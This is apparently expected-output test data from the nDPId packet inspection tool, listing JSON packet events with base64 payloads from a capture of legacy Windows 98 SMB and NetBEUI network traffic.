00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":59,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845301} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":59,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845301}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":60,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAQAAAAAAAQACo2haC8B0A+lo+\/82xHHoVEVTVDEgICAgICAgICAgAA=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":60,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAQAAAAAAAQACo2haC8B0A+lo+\/82xHHoVEVTVDEgICAgICAgICAgAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":60,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845853} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":60,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845853}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":61,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAgAA=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":61,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAgAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":61,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845853} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":61,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845853}
00507{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":62,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00493{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":62,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409846177} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":62,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409846177}
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1576409851581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADNJQAAAIARtE3AqO+BwKjv\/wCKAIoAuRxGEQIADsCo74EAigCjAAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1576409851581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADNJQAAAIARtE3AqO+BwKjv\/wCKAIoAuRxGEQIADsCo74EAigCjAAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00507{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":64,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00493{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":64,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409856181} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409856181}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":65,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiAAQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiAAQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":65,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409859028} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":65,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409859028}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":66,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vCgADAAAAAwBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":66,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vCgADAAAAAwBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":66,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409859028} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":66,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409859028}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":67,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAC\/w8AMsAP\/vDhcVAAMAFQBURVNUMSAgICAgICAgICAATURKUjk4ICAgICAgICAgIA=="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":67,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAC\/w8AMsAP\/vDhcVAAMAFQBURVNUMSAgICAgICAgICAATURKUjk4ICAgICAgICAgIA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":67,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409859028} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":67,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409859028}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":68,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAAPw8H8sAP\/vAQAAAAAAAQACo2haC8B0A+lo+\/82xHHoVEVTVDEgICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":68,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAAPw8H8sAP\/vAQAAAAAAAQACo2haC8B0A+lo+\/82xHHoVEVTVDEgICAgICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":68,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409859029} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":68,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409859029}
00374{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":69,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAAPw8XNgDAAAAIARzrfAqO+BwKjvAgCJAIkATA7DAAgpAAABAAAAAAABIEVORUVF"} 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":69,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAAPw8XNgDAAAAIARzrfAqO+BwKjvAgCJAIkATA7DAAgpAAABAAAAAAABIEVORUVF"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":69,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409859029} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":69,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409859029}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":70,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8AEBAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8AEBAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":70,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859029} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":70,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859029}
00374{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":71,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEBDQAAAIARzbfAqO+BwKjvAgCJAIkATHy8AAIpAAABAAAAAAABIEZIRVBG"} 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEBDQAAAIARzbfAqO+BwKjvAgCJAIkATHy8AAIpAAABAAAAAAABIEZIRVBG"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":71,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859029} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":71,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859029}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":72,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyABLw8AAADgD\/7xmPygUVAAMAFQP\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAA"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyABLw8AAADgD\/7xmPygUVAAMAFQP\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAA"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":72,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409859029} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":72,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409859029}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":73,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieABLw8AADDgD\/7xeBvAUDABUAAxXvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVF"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieABLw8AADDgD\/7xeBvAUDABUAAxXvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVF"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":73,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409859029} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":73,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409859029}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":74,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEDAP\/vCgADAAAAAwBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAg"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":74,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEDAP\/vCgADAAAAAwBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":74,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859029} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":74,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859029}
00532{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":75,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":174,"pkt_type":160,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":174,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAKDw8AICDgD\/7xYEAAAAAAEAFQP\/U01CcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAhAABrAAJQQyBORVRXT1JLIFBST0dSQU0gMS4wAAJNSUNST1NPRlQgTkVUV09SS1MgMy4wAAJET1MgTE0xLjJYMDAyAAJET1MgTEFOTUFOMi4xAAJXaW5kb3dzIGZvciBXb3JrZ3JvdXBzIDMuMWEA"} 00518{"packet_event_id":1,"packet_event_name":"packet","packet_id":75,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":174,"pkt_type":160,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":174,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAKDw8AICDgD\/7xYEAAAAAAEAFQP\/U01CcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAhAABrAAJQQyBORVRXT1JLIFBST0dSQU0gMS4wAAJNSUNST1NPRlQgTkVUV09SS1MgMy4wAAJET1MgTE0xLjJYMDAyAAJET1MgTEFOTUFOMi4xAAJXaW5kb3dzIGZvciBXb3JrZ3JvdXBzIDMuMWEA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":75,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":160,"global_ts_msec":1576409859029} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":75,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":160,"global_ts_msec":1576409859029}
00374{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":76,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEEDwAAAIARy7fAqO+BwKjvAgCJAIkATA7DAAYpAAABAAAAAAABIEVORUVF"} 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEEDwAAAIARy7fAqO+BwKjvAgCJAIkATA7DAAYpAAABAAAAAAABIEVORUVF"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":76,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":76,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030}
00436{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":77,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":101,"pkt_type":87,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":101,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAFfw8AIEDgD\/7xYMAAABACgAAxX\/U01CcgAAAACAAAAAAAAAAAAAAAAAAAAAAAAyAAAhAA0EAAIAaAsCAAEAAwAVBQOAsmSPT8T\/AAAAAAgAFQUDgAEb9l0="} 00422{"packet_event_id":1,"packet_event_name":"packet","packet_id":77,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":101,"pkt_type":87,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":101,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAFfw8AIEDgD\/7xYMAAABACgAAxX\/U01CcgAAAACAAAAAAAAAAAAAAAAAAAAAAAAyAAAhAA0EAAIAaAsCAAEAAwAVBQOAsmSPT8T\/AAAAAAgAFQUDgAEb9l0="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":77,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":87,"global_ts_msec":1576409859030} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":77,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":87,"global_ts_msec":1576409859030}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":78,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEEAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEEAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":78,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":78,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030}
